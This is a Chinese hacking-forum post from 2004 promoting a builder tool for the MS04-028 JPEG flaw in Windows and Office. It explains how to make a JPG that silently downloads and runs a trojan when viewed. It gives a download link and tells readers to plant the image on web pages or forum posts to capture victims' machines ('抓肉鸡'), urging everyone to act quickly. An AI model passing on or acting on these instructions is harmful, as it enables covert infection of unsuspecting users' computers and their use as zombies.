|
 | 作者: TSnew [tsnew]
 论坛用户 |
登录 |
| 最新MS04-028JPEG漏洞!!! 这个严重的安全漏洞,与微软的Windows 和其他软件处理JPEG图形的过程有关。由于微软的IE浏览器非常容易被攻击,Windows 使用者可能只是造访含有JPEG图片的网站,就成为攻击的受害者。 受影响的至少有十几种微软的应用软件和操作系统,包括Windows XP、Windows Server 2003 、Office XP 、Office 2003 、IE 6、Service pack 1、Project 、Visio 、Picture It和Digital Image Pro。微软已在网站上公布完整的名单,目前仍在陆续安装的Windows XP Service Pack 2,并没有这项缺失。 现在针对这个漏洞的病毒已经出来了!!!我们菜鸟的利用程序也出来了!!哈哈!~ 有福了,这个利用程序相当于一个URL下载/运行木马!以前我们的这类木马是exe类型的,嘿嘿, 现在是jpg图片类型了!!!!利用很简单!我们打开程序,填上我们木马的绝对地址就可以了 生成一个jpg图片文件!呵呵,做一个网页什么的,把那个图片插入就可以了,别人一浏览就会从 你设置好的那个地址下载木马并且运行!! 还有很多方法运行的!在论坛中 [img]图片地址[/img] 这个图片地址一般是你上传图片时 系统会提示的!论坛可以上传jpg图片!(前提是你注册了) 容易吧!!!!!大家快点行动哦!!!!! 最新MS04-028JPEG漏洞利用程序 下载地址:http://superhan.ys168.com |
| 地主 发表时间: 04-09-29 01:04 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 最新MS04-028JPEG漏洞利用程序!(抓肉鸡的快捷方法)